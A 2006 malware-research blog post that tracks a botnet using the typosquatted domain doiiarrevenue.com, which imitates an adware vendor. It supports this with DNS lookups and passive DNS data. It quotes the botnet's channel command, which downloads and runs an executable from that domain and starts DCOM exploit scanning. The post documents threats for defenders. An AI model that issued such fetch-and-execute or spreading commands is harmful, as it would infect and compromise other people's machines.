< Live Botnet Feed | "$NAME message" | "It me $NAME" | "Me again $NAME" | "$NAME wrote" >

doIIarrevenue.com

Vitalsecurity.org has an interesting article entitled "Beware of DoiiarRevenue.com: Mimicking an Adware vendor for fun and profit". Some time ago I also stumbled across this domain while tracking a botnet with the following topic, which is executed by all bots joining the command channel:
:.t kill all |.db http://promo.doIIarrevenue.com/webmasterexe/drsmartload195a.exe 

            c:\drsmartload195a.exe r |.advscan dcom135 100 3 0 -b -r

Instead of the usual promo.dollarrevenue.com link to a drsmartload.exe file, this botnets uses the doiiarrevenue.com site:
$ host dollarrevenue.com
dollarrevenue.com has address 194.187.45.56
dollarrevenue.com mail is handled by 10 MAIL.dollarrevenue.com.

$ host doiiarrevenue.com
doiiarrevenue.com has address 68.142.212.122
doiiarrevenue.com has address 68.142.212.117
doiiarrevenue.com has address 68.142.212.118
doiiarrevenue.com has address 68.142.212.119
doiiarrevenue.com has address 68.142.212.120
doiiarrevenue.com has address 68.142.212.121
doiiarrevenue.com mail is handled by 20 mx1.biz.mail.yahoo.com.
doiiarrevenue.com mail is handled by 30 mx5.biz.mail.yahoo.com.


Via the passive DNS replication service of RUS CERT it is quite obvious that these IPs are also used for other purposes:

The server returned the following data:



xoindustries.ca	 A 	68.142.212.122

norja.cc	 A 	68.142.212.122

prsindia.org	 A 	68.142.212.122

boc.org		 A 	68.142.212.122

iaftd.org	 A 	68.142.212.122

auspiciouscoincidence.org	 A 	68.142.212.122

investforlife.org	 A 	68.142.212.122

missmaine.org	 A 	68.142.212.122

nypdblue.org	 A 	68.142.212.122

rovang.org	 A 	68.142.212.122

artfulexpression.org	 A 	68.142.212.122

fbcindep.org	 A 	68.142.212.122

a-family-affair.org	 A 	68.142.212.122

[...]


So, what is going on here? The only thing I can say currently: doiiarrevenue also hosts a file called vv663.exe which is clearly malicious as the analysis by CWSandbox points out (report in XML format).
This entry was posted by Thorsten Holz on Thursday, November 23. 2006 at 13:38. and is filed under malware. You can leave a response, or trackback from your own blog. All new comments are subject to moderation before being displayed.

Trackbacks

Trackback specific URI for this entry

    No Trackbacks

Comments

Display comments as (Linear | Threaded)

    No comments


Add Comment


Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA
 
Submitted comments will be subject to moderation before being displayed.